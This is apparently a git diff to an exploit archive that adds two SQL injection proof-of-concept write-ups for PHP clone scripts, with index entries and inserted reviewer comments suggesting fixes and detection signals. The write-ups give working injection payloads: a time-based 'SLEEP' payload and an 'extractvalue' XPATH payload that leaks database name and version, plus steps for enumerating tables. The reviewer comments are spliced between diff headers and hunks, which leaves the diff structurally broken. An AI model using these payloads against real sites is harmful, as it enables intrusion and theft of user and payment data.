diff --git a/exploits/php/webapps/44017.txt b/exploits/php/webapps/44017.txt
new file mode 100644
index 000000000..8d29a2ae4
--- /dev/null
+++ b/exploits/php/webapps/44017.txt
@@ -0,0 +1,36 @@
+# Exploit Title: Paypal / Money Transfer Clone Script 1.0.9 - SQL Injection
+# Dork: N/A
+# Date: 2018-02-10
+# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
+# Vendor Homepage:
+https://www.phpscriptsmall.com/product/paypal-money-transfer-clone/
+# Version: 1.0.9
+# Category: Webapps
+# CVE: N/A
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands.
+# # # # #
+# Proof of Concept :
+
+SQLI :
+
+http://localhost/PATH/registrationpersonal.php?id=[SQL]
+
+# Parameter : id (GET)
+# Type: Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.50 AND time-based blind
+# Payload: AND SLEEP(10)
+
+#########################################################
+
+http://localhost/PATH/registrationmail.php?acctype=[SQL]
+
+# Parameter : acctype (GET)
+# Type : Error based
+# Title : MySQL >= 5.0 AND error based - Extractvalue (XPATH query)
+# Payload : 1' and
+extractvalue(1,/*!00000Concat(0x3a,database(),0x3a,0x3a,version())*/)%23
+
+# Description: First inject payload into parameter and load URL . then fill all fields and click "continue".
+# You will have version and db_name in the next page . You can find all tables using XPATH query and see result in the next page .
\ No newline at end of file
diff --git a/exploits/php/webapps/44018.txt b/exploits/php/webapps/44018.txt
new file mode 100644
index 000000000..0acaa3fcc
--- /dev/null
+++ b/exploits/php/webapps/44018.txt
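Review bot: In 44017.txt the `id` entry reads `# Type: Type: AND/OR time-based blind`; the duplicated label should be dropped so it matches the `# Type : Error based` line used for `acctype`. The write-up ends at reproduction and gives an operator of this script nothing to act on: judging from the two proofs of concept, `id` in registrationpersonal.php and `acctype` in registrationmail.php both reach a MySQL query unescaped, so a closing line such as `# Fix: bind id and acctype as prepared-statement parameters and cast id to an integer` would be worth adding. For detection, the signals these two entries imply are responses from registrationpersonal.php that stall for a fixed delay and XPATH syntax errors rendered on the page after registrationmail.php. The file also has no `# Tested on:` line, so the environment in which 1.0.9 was confirmed is not recorded.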
@@ -0,0 +1,23 @@
+##################################################################
+# Exploit Title: Readymade Video Sharing Script - SQL Injection (Error Based)
+# Google Dork: NA
+# Date: 10.02.2018
+# Exploit Author: Varun Bagaria
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/php-video-sharing-script/
+# Version: 3.2
+# Tested on: Windows 7
+# Category: Webapps
+# CVE : NA
+##################################################################
+
+Proof of Concept
+=================
+
+Attack Parameter : search
+Payload : '
+
+Reproduction Steps:
+------------------------------
+1. Access the website
+2. In the search bar insert ' and you will get error based SQL Injection
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index a282fda74..ab2480fdb 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
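Review bot: The proof of concept in 44018.txt names only `Attack Parameter : search` and never says which script or request method carries it, so a defender cannot tell which endpoint to patch or monitor. The only evidence given is that a single quote in the search bar produces a database error; that shows the input breaks the query and that error text reaches the client, which supports the injection claim but is not shown in the write-up. The title line also omits the version even though the header carries `# Version: 3.2`. Suggest adding the affected page path and a closing line such as `# Fix: pass the search term as a bound parameter and stop returning database errors to the client`.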
@@ -38023,6 +38023,8 @@ id,file,description,date,author,type,platform,port
 44014,exploits/php/webapps/44014.txt,"Select Your College Script 2.0.2 - Authentication Bypass",2018-02-10,"Prasenjit Kanti Paul",webapps,php,
 44015,exploits/php/webapps/44015.txt,"Multi religion Responsive Matrimonial 4.7.2 - Cross-Site Scripting",2018-02-10,"Prasenjit Kanti Paul",webapps,php,
 44016,exploits/php/webapps/44016.txt,"Multi Language Olx Clone Script - Cross-Site Scripting",2018-02-10,"Varun Bagaria",webapps,php,
+44017,exploits/php/webapps/44017.txt,"Paypal Clone Script 1.0.9 - 'id' / 'acctype' SQL Injection",2018-02-11,L0RD,webapps,php,
+44018,exploits/php/webapps/44018.txt,"Readymade Video Sharing Script 3.2 - 'search' SQL Injection",2018-02-11,"Varun Bagaria",webapps,php,
 41641,exploits/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
 41642,exploits/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
 41644,exploits/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",webapps,php,80